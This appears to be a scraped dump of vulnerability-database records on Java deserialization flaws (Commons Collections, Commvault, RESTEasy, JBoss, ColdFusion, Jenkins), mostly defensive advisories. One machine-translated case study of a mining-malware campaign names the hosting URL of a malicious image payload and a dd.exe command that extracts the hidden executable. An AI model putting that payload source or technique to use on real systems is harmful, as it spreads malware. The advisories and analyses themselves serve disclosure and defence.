For details refer to the information given in the Security Advisory OBSO-1511-01.\n\nWe recommend all customers to apply the mitigations described in the advisory and install the corresponding product fix releases as soon as available. \nTo get notified about Advisory updates, subscribe as listed in `<https://www.unify.com/security/advisories>`.\"\n\n### Vendor Information \n\nUnify has issued Security Advisory OBSO-1511-01 at the URL listed below. \n \nMitre had assigned two CVE IDs for Unify products impacted by VU#576313: \n \nCVE-2015-8237, affected products: \nUnify OpenScape Fault Management V7 (\"cpe:/a:unify:openscape_fault_management:7.%02\") \nUnify OpenScape Fault Management V8 (\"cpe:/a:unify:openscape_fault_management:8.%02\") \n \nCVE-2015-8238, affected products: \nUnify OpenScape UC Application V7 (\"cpe:/a:unify:openscape_uc_application:7.%02\") \nUnify OpenScape Common Management Platform V7 (\"cpe:/a:unify:openscape_common_management_platform:7.%02\")\n\n### Vendor References\n\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n\n### Red Hat, Inc. 
__ Unknown\n\nUpdated: November 30, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nJBOSS has been reported as being affected.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.4 | E:POC/RL:W/RC:C \nEnvironmental | 6.4 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>\n * <https://issues.apache.org/jira/browse/COLLECTIONS-580>\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n * [http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 >)\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n * <http://www.openwall.com/lists/oss-security/2015/11/11/3>\n * <http://www.infoq.com/news/2015/11/commons-exploit>\n * <https://tersesystems.com/2015/11/08/closing-the-open-door-of-java-object-serialization/>\n * <http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>\n * <http://mail-archives.apache.org/mod_mbox/commons-dev/201511.mbox/%3c20151106222553.00002c57.ecki@zusammenkunft.net%3e>\n * <http://frohoff.github.io/appseccali-marshalling-pickles/>\n * <http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles>\n * <https://www.youtube.com/watch?v=VviY3O-euVQ>\n * <https://commons.apache.org/proper/commons-collections/>\n * <http://cwe.mitre.org/data/definitions/502.html>\n * 
<https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>\n * <http://www.oracle.com/technetwork/java/seccodeguide-139067.html#8>\n\n### Acknowledgements\n\nThis type of vulnerability was reported publicly by Gabriel Lawrence and Chris Frohoff, and later investigated by Stephen Breen.\n\nThis document was written by Garret Wassermann with assistance from David Svoboda and the CERT Secure Coding team.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-6420](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6420>) \n---|--- \n**Date Public:** | 2015-01-28 \n**Date First Published:** | 2015-11-13 \n**Date Last Updated: ** | 2018-08-27 17:57 UTC \n**Document Revision: ** | 89 \n", "cvss3": {}, "published": "2015-11-13T00:00:00", "type": "cert", "title": "Apache Commons Collections Java library insecurely deserializes data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-6420", "CVE-2015-8103", "CVE-2015-8237", "CVE-2015-8238"], "modified": "2018-08-27T17:57:00", "id": "VU:576313", "href": "https://www.kb.cert.org/vuls/id/576313", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-19T20:16:07", "description": "### Overview\n\nCommvault Edge Server, version 10 R2, deserializes untrusted, user-provided cookie data, resulting in arbitrary OS command execution with the web server's privileges.\n\n### Description\n\n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data** \\- 
CVE-2015-7253\n\n[Commvault](<http://www.commvault.com/>) Edge Server, version 10 R2, deserializes user-provided cookie data without properly validating it first. An unauthenticated attacker with access to the Commvault Edge Server Web Console can provide specially crafted cookie data that, when deserialized, results in the execution of arbitrary OS commands with the web server's privileges. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker can provide specially crafted cookie data that, when deserialized, will execute arbitrary OS commands with the privileges of the web server. \n \n--- \n \n### Solution\n\n**Apply an update** \n \nThe vendor has [issued updates](<http://docs.commvault.com/commvault/v10/article?p=announcement/announcements.htm#Security>) to address this vulnerability. Users are encouraged to update to the latest release, but those unable or unwilling to do so should consider the following workaround. \n \n--- \n \n**Restrict access** \n \nAs a general good security practice, only allow connections from trusted hosts and networks. \n \n--- \n \n### Vendor Information\n\n866432\n\n
### Commvault Affected\n\nNotified: September 17, 2015 Updated: November 03, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 8.5 | E:POC/RL:U/RC:UR \nEnvironmental | 2.1 | CDP:ND/TD:L/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://www.commvault.com/>\n * <https://cwe.mitre.org/data/definitions/502.html>\n * <http://docs.commvault.com/commvault/v10/article?p=announcement/announcements.htm#Security>\n\n### Acknowledgements\n\nThanks to Markus Wulftange and Matthias Kaiser of Code White for reporting this vulnerability.\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-7253](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-7253>) \n---|--- \n**Date Public:** | 2015-11-03 \n**Date First Published:** | 2015-11-03 \n**Date Last Updated: ** | 2015-11-06 13:13 UTC \n**Document Revision: ** | 16 \n", "cvss3": {}, "published": "2015-11-03T00:00:00", "type": "cert", "title": "Commvault Edge Server deserializes cookie data insecurely", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7253"], "modified": "2015-11-06T13:13:00", "id": "VU:866432", "href": "https://www.kb.cert.org/vuls/id/866432", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T16:40:24", "description": "Apache Commons includes a class called InvokerTransformer. An application is vulnerable to a deserialization attack if this class is available on the classpath and the application deserializes untrusted or user-supplied data. It's not necessary to actually use InvokerTransformer to be vulnerable. With these two criteria satisfied, an attacker may construct a gadget chain using classes in the component to execute arbitrary code. The chain relies on the class InvokerTransformer in the org.apache.commons.collections.functors package to invoke methods during the deserialization process. The fix prevents deserialization of InvokerTransformer by default unless it's specifically enabled. CVE-2015-4852, CVE-2015-6420, CVE-2015-7501, and CVE-2015-7450 are all related to this artifact.\n", "cvss3": {}, "published": "2015-11-09T19:34:22", "type": "veracode", "title": "Potential Remote Code Execution Via Java Object Deserialization", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852", "CVE-2015-6420", "CVE-2015-7450", "CVE-2015-7501"], "modified": "2022-04-19T18:41:05", "id": "VERACODE:1847", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-1847/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:33:33", "description": "RESTEasy is vulnerable to remote code execution. 
SnakeYAML unmarshalling is exploitable for code execution. As RESTeasy uses SnakeYAML and enables the yaml provider by default, under certain conditions, RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker can exploit it to execute arbitrary code with the permissions of the application using RESTEasy.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-15T09:16:49", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2019-05-15T06:18:25", "id": "VERACODE:12408", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-12408/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T16:16:30", "description": "RESTEasy is vulnerable to remote code execution. SnakeYAML unmarshalling is exploitable for code execution. 
As RESTeasy uses SnakeYAML and enables the yaml provider by default, under certain conditions, RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker can exploit it to execute arbitrary code with the permissions of the application using RESTEasy.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-16T08:05:27", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2019-05-15T06:18:25", "id": "VERACODE:3126", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-3126/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:17:10", "description": "Jenkins is vulnerable to command injection. The attack exists because it allows an injection of serialized Java object, related to a problematic webapps/ROOT/WEB-INF/lib/commons-collections-*.jar file and the \"Groovy variant in 'ysoserial'\". 
\n", "cvss3": {}, "published": "2019-05-02T05:21:37", "type": "veracode", "title": "Command Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8103"], "modified": "2019-12-18T06:27:13", "id": "VERACODE:16660", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-16660/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T16:13:53", "description": "flex-messenger-core is vulnerable to remote code execution (RCE). The AMF3 deserializers in the library allow the instantiation of arbitrary classes via parameter-less Java Beans constructors. 
This allows a malicious user to send a malicious AMF3 object to the system to execute arbitrary code.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T08:05:24", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2022-04-19T18:29:52", "id": "VERACODE:3853", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-3853/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:21:32", "description": "jbossas is vulnerable to arbitrary code execution attacks. 
The vulnerability exists in JBoss Application Server as shipped with Red Hat Enterprise Application Platform 5.2: the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict the classes for which it performs deserialization, allowing an attacker to execute arbitrary code via crafted serialized data.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-15T09:24:03", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149"], "modified": "2019-05-15T06:18:28", "id": "VERACODE:12954", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-12954/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2017-10-19T18:33:24", "description": "A security update released for Adobe ColdFusion in 2017 9 November 12 notes that earlier versions contain serious deserialization vulnerabilities (CVE-2017-11283, CVE-2017-11284) that may lead to remote code execution. 
Systems that use the Flex integration service with Remote Adobe LiveCycle Data Management access enabled may be affected by this vulnerability; enabling that feature starts an RMI service listening on port 1099. The Java version bundled with ColdFusion is too old and does not validate the objects in an RMI request before deserializing them. \n360CERT has analyzed and verified the vulnerability and confirmed that it is real; affected users should apply the update as soon as possible. \n0x01 Affected versions \n1. ColdFusion (2016 release) Update 4 and previous versions \n2. ColdFusion 11 Update 12 and earlier versions \n0x02 Vulnerability verification \nSending a constructed payload to the RMI service is enough for a simple verification of remote code execution. \n! [](/Article/UploadPic/2017-10/201710192392498. png? www. myhack58. com) \n0x03 Remediation \n1. Disable Remote Adobe LiveCycle Data Management access on the administration page \n2. 
Upgrade to the latest patched version: ColdFusion (2016 release) Update 5, ColdFusion 11 Update 13\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-10-19T00:00:00", "type": "myhack58", "title": "Adobe ColdFusion arbitrary command execution flaws vulnerability 0day(CVE\u20132017\u201311283, CVE\u20132017\u201311284)early warning-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11283", "CVE-2017-11284"], "modified": "2017-10-19T00:00:00", "id": "MYHACK58:62201789628", "href": "http://www.myhack58.com/Article/html/3/62/2017/89628.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-15T15:17:59", "description": "BAT represents the bright side of making a fortune on the Internet; on the dark side, the underground black-market industry also stretches its imagination to maximize its own gain, and in this respect it can be described as the Eight Immortals crossing the sea, each showing their own abilities. 
Some steal data and resell it to achieve financial freedom; those who stop in time end up with no worries about food and drink for the rest of their lives, while the insatiable, under the increasingly severe crackdown of recent times, end up eating prison meals. Besides making money from data, we also see some earning a small fortune by extracting the computing power of devices. Recently, the SkyEye lab tracked gangs that use these N-day vulnerabilities to attack servers, gain control and automatically implant mining Trojans; here we analyze a real case for everyone. \nWe hope this small exposure prompts some administrators to wake up, check whether their servers have these vulnerabilities, remove malicious code already present on the machines (if the vulnerability exists, the server has almost certainly already been compromised and controlled), and ensure the security of data and services. \nJava-based web application servers have had several very easy-to-exploit remote command execution vulnerabilities, such as the following two: \nCVE-2015-7450 \nIBM WebSphere Java Commons Collections component deserialization vulnerability\nCVE-2015-4852 \nOracle WebLogic Server Java deserialization vulnerability\nThe vulnerability details are not analyzed here. Although the technical details and exploitation tools have been public for almost 2 years, there are still a large number of [web servers](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>) on the Internet with these vulnerabilities, and these servers will sooner or later become the attacker's prey. 
As for what exactly a controlled machine will be used for: any data the attackers find will inevitably be stolen and resold. Beyond that, servers generally have very good hardware (mass storage, high-speed CPUs and network connections), and with the price of bitcoin now relatively high, using a captured server for mining to make full use of its computing capacity is another way for the underground industry to squeeze every bit of profit from a compromised machine. \nCase \nThe attackers scan IP ranges for servers with a specific port open, confirm that the web application server is vulnerable, exploit the vulnerability to take control of the server, and then download a picture containing bitcoin mining malware, which is parsed and executed; the server thereby becomes a mining bot. \n! [](/Article/UploadPic/2017-3/2017315211310444. png? www. myhack58. com) \nThe sample comes from a honeypot we set up; the server exposes a WebLogic service at http://xxx.xx.xx.xxx:7001/: \n! [](/Article/UploadPic/2017-3/2017315211311260. png? www. myhack58. com) \nLog analysis revealed that the attacker used the Java deserialization vulnerability in the WebLogic application server to compromise the server. After gaining control, the attacker first executes a script that downloads and runs a program named regedit.exe; this program calls powershell.exe to execute the following PowerShell script: \n! [](/Article/UploadPic/2017-3/2017315211312713. png? www. myhack58. com) \nThe PowerShell code is shown below: \n! [](/Article/UploadPic/2017-3/2017315211312591. png? www. myhack58. com) \nThe script first downloads the utility dd.exe from an open-source website and uses it to write files. Most mainstream antivirus products whitelist dd.exe, so using this tool can bypass part of the detection. The figure below shows an introduction to dd.exe: \n! 
[](/Article/UploadPic/2017-3/2017315211312114. png? www. myhack58. com) \nThe script also downloads a jpg picture from https://ooo.0o0.ooo/2017/01/22/58842a764d484.jpg: \n! [](/Article/UploadPic/2017-3/2017315211312785. png? www. myhack58. com) \nThe site https://ooo.0o0.ooo/ is itself a hosting service that provides external links for user-uploaded files: \n! [](/Article/UploadPic/2017-3/2017315211312429. png? www. myhack58. com) \nThe website interface is shown in the figure; the maximum upload file size is 5MB: \n! [](/Article/UploadPic/2017-3/2017315211312244. png? www. myhack58. com) \nThe downloaded picture is 1.44M in size, so it is of course not just a picture: \n! [](/Article/UploadPic/2017-3/2017315211313104. png? www. myhack58. com) \nAnalysis found that a PE file starts at offset 0xd82 (3458) of the image: \n! [](/Article/UploadPic/2017-3/2017315211313727. png? www. myhack58. com) \nFinally, the script calls dd.exe to extract the PE file from the picture and names it msupdate.exe: dd.exe if=favicon.jpg of=msupdate.exe skip=3458 bs=1. \nThe extracted PE is a self-extracting file: \n! [](/Article/UploadPic/2017-3/2017315211313210. png? www. myhack58. com) \nAfter running and extracting, it executes msupdate.exe: \n! [](/Article/UploadPic/2017-3/2017315211313793. png? www. myhack58. com) \nmsupdata.exe is itself also a self-extracting file: \n! [](/Article/UploadPic/2017-3/2017315211313616. png? www. myhack58. 
com)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-15T00:00:00", "type": "myhack58", "title": "The use of server vulnerability mining black production case study-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450", "CVE-2015-4852"], "modified": "2017-03-15T00:00:00", "id": "MYHACK58:62201784367", "href": "http://www.myhack58.com/Article/html/3/62/2017/84367.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-05T09:00:41", "description": "Source: [gone with the wind's Blog](<https://www.iswin.org/2017/01/25/Jenkins-LDAP-Deserializable-Vulnerablity-CVE-2016-9299-Analysis/>)\n\nAuthor: [iswin](<https://www.iswin.org/about>)\n\nThis vulnerability in the last 11 month of official release announcement when I was concerned too, when he was looking for com. sun. jndi. ldap. 
LdapAttribute, a class related to deserialization, I noticed that the _getAttributeSyntaxDefinition()_ and _getAttributeDefinition()_ methods inside it might have a deserialization problem. At the time, after looking through a lot of classes for ones that can trigger these two methods during deserialization, I originally thought the problem was inside the JDK itself, and in the end I did not pursue it further. In the meantime, a foreigner released a PPT presenting this vulnerability; from a quick look, it uses json to bypass the Jenkins whitelist. At that time I was busy with data analysis work, so the matter was shelved. Shortly before writing this, a Payload appeared in MSF, and since I had less to do, I studied it. This vulnerability is quite interesting and touches a fairly wide range of knowledge; I have to admire the people who find such vulnerabilities.\n\nWhenever a vulnerability appears, I start thinking about why I could not find it myself, and every time I finish analyzing one I find that the gap really is not small.\n\n#### Technology is meant to be shared; that is how we progress.\n\n### Vulnerability description\n\nOn November 16, 2016, Jenkins released an official security announcement for [CVE-2016-9299](<https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16>). According to the announcement, the vulnerability is again a deserialization vulnerability, this time involving deserialization and LDAP: after deserialization, the target needs to connect to a malicious LDAP server. Jenkins' earlier fix for deserialization issues was to add certain malicious classes to a blacklist, so the first step here is to bypass the official blacklist. That is all the information available about the vulnerability, and the officially provided POC also merely mentions the com.sun.jndi.ldap.
LdapAttribute class. Exploiting this vulnerability does not require authentication first, yet it allows arbitrary code execution, so the harm is evident.\n\n### Vulnerability analysis\n\nJudging from the official description and the Payload discussed later, the problem is related to net.sf.json and com.sun.jndi.ldap.LdapAttribute. By analyzing the LdapAttribute class, we can determine that the following two methods are the root of the deserialization vulnerability (for background on LDAP deserialization, see the Black Hat 2016 paper \u201cus-16-Munoz-A-Journey-From-the JNDI-LDAP-Manipulation-To-RCE\u201d):\n\n* getAttributeSyntaxDefinition\n* getAttributeDefinition\n\nBoth methods invoke the code fragment _DirContext schema = getBaseCtx().getSchema(rdn);_, where the getBaseCtx() method is defined as follows:\n\n![](/Article/UploadPic/2017-2/201724165543569.png)\n\nThis section of code uses JNDI to access the LDAP service. Here we can control the Context.PROVIDER_URL parameter, and thereby control the address of the LDAP server that JNDI accesses.\n\nThe getSchema(rdn) method eventually calls the com.sun.jndi.ldap.LdapBindingEnumeration.createItem(String, Attributes, Vector) method (the call chain is too long to list here, so step through it in a debugger yourself). The method is defined as shown in the following figure:\n\n![](/Article/UploadPic/2017-2/201724165544831.png)\n\nThis method eventually calls the Obj.decodeObject(attrs) method, which performs the object deserialization. As a side note, com.sun.jndi.ldap.Obj defines several ways of serializing and deserializing objects: some deserialize directly, and some load the object remotely. The deserialization here differs slightly in that we cannot load objects remotely, because com.sun.jndi.ldap.VersionHelper12.
trustURLCodebase defaults to false, which means the class loader can only load classes on the current classpath. How to construct the object so that arbitrary code executes when LDAP deserializes it is covered below.\n\nWe now know that the relevant methods of com.sun.jndi.ldap.LdapAttribute can trigger the deserialization vulnerability, so what we have to do next is find a class that, at deserialization time, calls the functions that trigger the vulnerability, that is, a class that calls the getAttributeSyntaxDefinition method or the getAttributeDefinition method during deserialization. From the foreigner's PPT and the published gadgets, a little analysis shows that the net.sf.json library contains a place that can call any getXXX function of a class, so can the getXXX methods of com.sun.jndi.ldap.LdapAttribute also be called this way? First, we determine exactly which method of which class can call the getXXX functions. From the json Payload in the gadgets we find that the function that eventually calls the object's getXXX functions is net.sf.json.JSONObject.defaultBeanProcessing(Object, JsonConfig), as shown in the figure.\n\nThe two places circled in the figure are where the getXXX functions can be called: the code first traverses all the properties of the JavaBean and then calls them one by one.\n\nHaving figured out the root cause of the function call, the next step is to find what exactly triggers this function. With Eclipse we can easily find the following call.\n\n! [](/Article/UploadPic/2017-2/201724165544409. 
